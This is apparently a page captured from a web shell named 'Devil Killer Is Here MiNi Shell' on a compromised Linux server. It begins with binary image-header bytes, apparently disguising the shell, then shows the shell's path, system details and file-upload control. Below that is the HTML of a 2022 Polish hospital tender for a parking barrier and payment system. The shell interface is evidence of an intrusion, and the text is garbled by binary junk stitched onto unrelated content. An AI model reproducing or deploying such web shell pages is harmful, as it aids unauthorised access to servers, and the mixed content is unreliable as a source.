JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220907/0033713901-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> zakup systemu parkingowego w 60 równych ratach wraz z serwisem utrzymaniowym - powtórka. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Międzyleski Szpital Specjalistyczny w Warszawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010669853</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bursztynowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">04-749</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@mssw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mssw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> zakup systemu parkingowego w 60 równych ratach wraz z serwisem utrzymaniowym - powtórka. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-fff97466-2e90-11ed-8832-4e4740e186ac</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00337139</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mssw.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://mssw.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">6. Zamawiający określa niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę na Platformie tj: 6.1 stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>6.2komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, <br/>procesor Intel IV 2GHZ, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>6.3 zainstalowana dowolna przeglądarka internetowa obsłgująca TLS 1.2., najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>6.4 włączona obsługa JavaScript;<br/>6.5 zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie „pdf”</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 Ogólnego Rozporządzenia o Ochronie Danych (RODO) informujemy, że: <br/>1)	Administratorem Państwa danych osobowych jest Międzyleski Szpital Specjalistyczny w Warszawie, adres: ul. Bursztynowa 2, 04-749 Warszawa;<br/>2)	Administrator wyznaczył Inspektora Ochrony Danych, z którym mogę się kontaktować w sprawach przetwarzania moich danych osobowych za pośrednictwem poczty elektronicznej: iod@mssw.pl;<br/>3)	Dane osobowe Wykonawcy przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonego na podstawie art. 275 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (dalej ustawa Pzp) - w odniesieniu do postępowań poniżej progów unijnych oraz na podstawie art. 129 ww. ustawy w odniesieniu do postępowań powyżej progów unijnych;<br/>4)	Dane osobowe mogą być udostępnione innym uprawnionym podmiotom, na podstawie przepisów prawa, a także podmiotom, z którymi administrator zawarł umowę w związku z realizacją usług na rzecz administratora (np. kancelarią prawną, dostawcą oprogramowania, zewnętrznym audytorem, zleceniobiorcą świadczącym usługę z zakresu ochrony danych osobowych). odbiorcami danych osobowych Wykonawcy będą również osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp;<br/>5)	Administrator nie zamierza przekazywać Państwa danych osobowych do państwa trzeciego lub organizacji międzynarodowej;<br/>6)	Mają Państwo prawo uzyskać kopię swoich danych osobowych w siedzibie administratora.<br/>Dodatkowo zgodnie z art. 13 ust. 2 RODO informujemy, że:<br/>1)	Dane osobowe Wykonawcy będą przechowywane, zgodnie z art. 78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; w przypadku zamówień realizowanych w ramach projektów (np. współfinansowanych ze środków Unii Europejskiej) przez okres wskazany w wytycznych w zakresie kwalifikowalności wydatków;<br/>2)	Przysługuje Państwu prawo dostępu do treści swoich danych, ich sprostowania lub ograniczenia przetwarzania, a także prawo do wniesienia skargi do organu nadzorczego;<br/>3)	Podanie danych osobowych jest dobrowolne, jednakże niezbędne do realizacji ww. celu. Konsekwencje niepodania danych określa ustawa Pzp;<br/>4)	Administrator nie podejmuje decyzji w sposób zautomatyzowany w oparciu o Państwa dane osobowe.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">D - 24/P/22’’</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Zamawiający planuje rozmieścić (zamontować) 4 szlabany wjazdowe i 2 szlabany wyjazdowe Przy każdym szlabanie należy w jezdni zagnieździć pętle indukcyjne aktywujące terminal i zamykające szlaban po opuszczeniu strefy wjazdu, wyjazdu. Dla instalacji należy wykonać nową kanalizację kablową, jeżeli Wykonawca wykorzysta istniejące okablowanie ponosi pełną odpowiedzialność za funkcjonowanie systemu i obejmie je pełną gwarancją w ramach dostawy systemu. Przy szlabanach wjazdowych i wyjazdowych do obu stref odpowiednio zamontować terminale wjazdowe i wyjazdowe. Kasy automatyczne obsługujące płatności zlokalizować w okolicy wyjścia z budynku F oraz dyżurki ochrony. System musi umożliwiać szybkie podniesienie wszystkich szlabanów lub tylko wybranych ze stanowiska ochrony w razie wystąpienia pożaru.<br/>2.	Dla systemu można wykorzystać w miarę możliwości kanalizację teletechniczną ze studzienką przy portierni. Dostawa, montaż, podłączenie, uruchomienie stanowiska obsługi i zarządzania z kasą manualną. Dostawa i montaż serwera wraz z licencjonowanym oprogramowaniem dla obsługi stanowisk systemu parkingowego. Dostawa akcesoriów dla uruchomienia systemu parkingowego. Roboty instalacyjne, szkolenie i uruchomienie systemu. <br/>Fizyczna obecność serwisu - do 2 godzin od zawiadomienia o awarii systemu parkingowego pod warunkiem, że usterki nie da się usunąć zdalnie.<br/>3.	Szczegółowe omówienie przewidzianych do montażu systemów dla obsługi parkingu<br/>System parkingowy powinien składać się z: <br/>3.1 Linia wjazdowa 4 szt. czyli terminal wjazdowy, pętle indukcyjne, szybki szlaban <br/>3.2 Linia wyjazdowa 3 szt. czyli terminal wyjazdowy, pętle indukcyjne, szybki szlaban. <br/>3.3 Kasa automatyczna 2 szt. w której kierowcy mogą zapłacić za parking. <br/>3.4	Wiata dla kasy automatycznej przy budynku ochrony.<br/>3.5 Serwer sytemu zarządzający oraz przechowujący dane. <br/>3.6 Komputer operatora z kasą manualną. <br/>3.7 Interkomy cyfrowe (wjazd, wyjazd). <br/>3.8	Monitoring i kamery do rejestracji zdarzeń przy szlabanach. Zamawiający wymaga minimum 4 kamery IP CCTV obejmujące nadzorem każdy wjazd i wyjazd. Jakość obrazu musi umożliwiać identyfikację sprawcy ewentualnych uszkodzeń systemu szlabanów. Rejestrator ma znajdować się w serwerowni szpitala.<br/>4.	Cechy i funkcje systemu parkingowego: <br/>Terminal wjazdowy 4 szt: <br/> • Obudowa z aluminium lub stali nierdzewnej malowana proszkowo <br/> • Drzwi terminala zabezpieczone zamkiem z jednym ryglowaniem lecz taką konstrukcją urządzenia, która uniemożliwia otwarcie osobom postronnym<br/> • Urządzenie przystosowane do pracy na zewnątrz w temp. otoczenia -25/+50 <br/>• Frontpanel zabezpieczony szkłem hartowanym grubości min. 3,5 mm<br/>• Drukarka biletów z kodem kreskowym lub QR (druk z rolki lub kartonu) zapas biletów min. 2 000 szt.<br/> • Wbudowany czytnik kart abonamentowych<br/> • Wbudowany interkom do łączności z obsługą parkingu <br/> • Grzałka i wentylator dla zapewnienia optymalnych warunków<br/> • Wbudowany, podświetlany wyświetlacz komunikatów o przekątnej min. 7” i jasności minimum 1000 cd/m2<br/> • Komunikaty dla użytkownika w minimum 2 językach (polski, angielski)<br/> • Czujnik ilości papieru w drukarce<br/> • Elektroniczne zarządzanie szlabanem<br/> • Wbudowany detektor obecności pojazdu<br/> • Szybki szlaban parkingowy z czasem otwarcia nie dłuższym niż 2 sekundy <br/> • Pętla indukcyjna aktywacyjna<br/> • Pętla indukcyjna zamykająca szlaban po przejechaniu <br/> • Jeden ze wskazanych terminali musi być wyposażony w system SOS do automatycznego otwarcia na dźwięk syreny karetki<br/>• Kolor RAL: do uzgodnienia <br/><br/>Terminal wyjazdowy – 2 szt:<br/>• Obudowa z aluminium lub stali nierdzewnej malowana proszkowo <br/>• Drzwi terminala zabezpieczone zamkiem z jednym ryglowaniem lecz taką konstrukcją urządzenia, która uniemożliwia otwarcie osobom postronnym<br/>• Urządzenie przystosowane do pracy na zewnątrz w temp. otoczenia -25/+50 <br/>• Frontpanel zabezpieczony szkłem hartowanym grubości min. 3,5 mm<br/>• Skaner kodów kreskowych<br/>• Wbudowany interkom VoIP do łączności z obsługą parkingu <br/>• Grzałka i wentylator dla zapewnienia optymalnych warunków<br/>• Wbudowany, podświetlany wyświetlacz komunikatów o przekątnej min. 7” i jasności minimum 1000 cd/m2<br/>• Komunikaty dla użytkownika w minimum 2 językach (polski, angielski)<br/>• Elektroniczne zarządzanie szlabanem<br/>• Wbudowany detektor obecności pojazdu<br/>• Szybki szlaban parkingowy z czasem otwarcia nie dłuższym niż 2 sekundy <br/>• Pętla indukcyjna aktywacyjna<br/>• Pętla indukcyjna zamykająca szlaban po przejechaniu<br/>• Kolor RAL : do uzgodnienia <br/><br/>Terminal wjazdowy do strefy wewnętrznej.<br/> • Słupek parkingowy z czytnikiem abonamentów oraz interkom <br/> • Pętla indukcyjna aktywacyjna<br/> • Szybki szlaban parkingowy z czasem otwarcia nie dłuższym niż 2 sekundy <br/> • Pętla indukcyjna zamykająca szlaban po przejechaniu<br/> Kolor RAL: do uzgodnienia <br/>Terminal wyjazdowy ze strefy wewnętrznej. <br/> • Słupek parkingowy z czytnikiem abonamentów oraz interkom <br/> • Pętla indukcyjna aktywacyjna<br/> • Szybki szlaban parkingowy z czasem otwarcia nie dłuższym niż 2 sekundy <br/> • Pętla indukcyjna zamykająca szlaban po przejechaniu<br/> • Połączenie z istniejącą bramą automatyczną<br/> Kolor RAL : do uzgodnienia<br/>5.	Podstawowe parametry techniczne szlabanu<br/> • Obudowa z aluminium lub stali ocynkowanej, malowana proszkowo<br/> • Ramię aluminiowe malowane na biało z gumą ochronną u dołu ramienia oraz naklejkami <br/> • Ramię szlabanu podświetlane LED R/G z funkcją semafora <br/> • Wbudowana elektronika sterująca<br/> • Czas otwarcia szlabanu nie dłuższy niż 2 sekundy<br/> • Intensywność pracy min 5 000 cykli na dobę ????<br/> • MCBF minimum 1 000 000 cykli <br/> • Szlaban powinien mieć możliwość awaryjnego opuszczania i podnoszenia np. przy zaniku zasilania <br/> • Sterowanie pracą szlabanu z terminali parkingowych i serwera parkingowego<br/> Kolor RAL: do uzgodnienia<br/>6.	Minimalne parametry techniczne kasy automatycznej<br/> • Obudowa wykonana ze stali nierdzewnej malowanej proszkowo <br/>• Akceptor monet z wydawaniem reszty, <br/>Metoda płatności monetami: 50 gr.1 zł. 2 zł. 5 zł.<br/> • Akceptor banknotów <br/> • Terminal płatności kartą, zbliżeniowo oraz Blik <br/>• Wyświetlacz dotykowy min. 15” <br/> • Obsługa w dwóch językach (polski, angielski)<br/> • Interkom audio klasy <br/> • Czytnik kart zbliżeniowych <br/> • Czytnik kodów z możliwością odczytu biletu papierowego <br/>Termiczna drukarka potwierdzeń do wydawania zagubionego biletu<br/>• Wentylacja i ogrzewania zarządzane elektronicznie<br/>• Pojemnik na monety z zapadką i zamkiem o pojemności 4 litrów<br/> • Drzwi kasy zabezpieczone zamkiem z trzypunktowym ryglem<br/>• Oświetlenie serwisowe wnętrza<br/> Kolor RAL: do uzgodnienia <br/><br/>Ważne! W związku z tym, że użytkownicy bardzo często wkładają do szczelin w kasie różne przedmioty np. karty płatnicze, monety czy inne przedmioty, nie dopuszcza się kasy z tzw. „połykaczem biletów”. Bilet musi być skanowany bez wkładania go do kasy.<br/>7.	Serwer parkingowy z funkcją kasy parkingowej.<br/>• Zestaw serwerowy z systemem operacyjnym Windows lub Linux oraz oprogramowaniem parkingowym wraz z niezbędnymi licencjami<br/>• Monitor, myszka, klawiatura<br/>• Czytnik administracyjny kart abonamentowych<br/>•	Drukarka fiskalna oraz terminal do przyjmowania płatności kartą płatniczą oraz blikiem<br/>• Centralka do łączności z terminalami oraz kasą automatyczną<br/>8.	System kamer identyfikujących tablice rejestracyjne.<br/>Z systemem parkingowym, na każdym wjeździe i wyjeździe zintegrowane będą kamery systemu rozpoznawania tablic rejestracyjnych. System będzie umożliwiał klientom uprawnionym do korzystania z parkingu wjazd i wyjazd bez użycia kart i biletów (przy założeniu poprawnego odczytu tablic rejestracyjnych). Klienci rotacyjni dostaną bilety z wydrukowanym na nich numerem rejestracyjnym. Po poprawnym rozliczeniu biletu w kasie automatycznej bilet nie będzie potrzebny do wyjazdu z parkingu(przy założeniu poprawnego odczytu tablic rejestracyjnych).<br/>9.	System rabatowy <br/>Rabatowanie biletów powinno odbywać się w punkcie kontrolnym z kasą ręczną lub w dowolnym miejscu obiektu wyposażonym w komputer z dostępem do sieci wewnętrznej połączonej z systemem parkingowym. Zamawiający wymaga minimum 4 punktów rabatowania.<br/><br/>Rabatowanie na stanowisku kontrolnym odbywa się poprzez program rabatujący. Dotychczasowy bilet będzie rabatowany w systemie poprzez skanowanie lub podanie nr rejestracyjnego pojazdu. <br/><br/>Oferent musi zapewnić gwarancję oraz obsługę serwisową przez okres min. 60 miesięcy. Serwis musi znajdować się nie dalej niż 100 km od lokalizacji zakupionego systemu parkingowego, a czas reakcji na awarię nie może przekroczyć 2 godzin.<br/><br/>Wszystkie dostarczone urządzenia muszą być fabrycznie nowe i wyprodukowane nie wcześniej niż w 2022 roku<br/><br/>II.Płatność za ww. system parkingowy będzie w 60 comiesięcznych ratach z możliwością wcześniejszej spłaty.<br/>III. Warunki serwisowania sprzętu. Wykonawca musi posiadać na terenie Polski autoryzowany serwis gwarancyjny i pogwarancyjny - potwierdzony stosownym dokumentem.<br/>1.	Wymagany minimalny okres pełnej gwarancji na sprzęt - 60 miesiące od daty podpisania protokołu odbioru.<br/>2.	Przedłużenie okresu gwarancji - o pełny okres niesprawności dostarczonego systemu.<br/>6.	Wykonawca zobowiązany jest udzielić 24 - miesięcznej gwarancji dla nowo zainstalowanych w trakcie naprawy części w okresie gwarancyjnym i minimum 12 miesięcznej gwarancji dla nowo zainstalowanych w trakcie naprawy części w okresie pogwarancyjnym.<br/>7.	W okresie gwarancji Wykonawca zapewni przeprowadzanie bezpłatnych przeglądów w ilości i zakresie zgodnym z wymogami określonymi w dokumentacji technicznej, potwierdzonymi stosownymi wpisami w paszport urządzenia.<br/>8.	Nieprzekraczający termin realizacji zamówienia – max do jednego miesiąca od dnia podpisania umowy </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34996300-8 - Parkingowe urządzenia kontrolne, bezpieczeństwa lub sygnalizacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas reakcji serwisu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas naprawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Ad. 2.4. Zamawiający uzna, iż Wykonawca posiada zdolność techniczną lub zawodową, jeżeli wykaże, że wykonał:<br/>a)	należycie wykonał w okresie ostatnich 3 lat co najmniej 1 usługę polegającą na:<br/><br/>dostawie i montaży systemu parkingowego i wartości minimum 300.000,00 zł brutto (słownie: trzysta tysięcy złotych brutto).<br/><br/>Spełnienie warunków posiadania zdolności technicznej i zawodowej, Zamawiający będzie oceniał:<br/>Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez Wykonawcę w niniejszym postępowaniu metodą spełnia / nie spełnia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">2.4 W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu <br/> Zamawiający żąda dokumentów:<br/> - Odpisu lub informacji z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej – w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>Wykonawca zgodnie z art. 127 ust. 1 ustawy p.z.p. nie jest obowiązany do złożenia odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, jeżeli:<br/> - Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r o informatyzacji działalności podmiotów realizujących zadania publiczne, (adres internetowy należy wskazać w Oświadczeniu, o których mowa w rozdziale V pkt. 1 ppkt 1.2).</span> </h3> <h3 class="mb-0"> 5.7.) 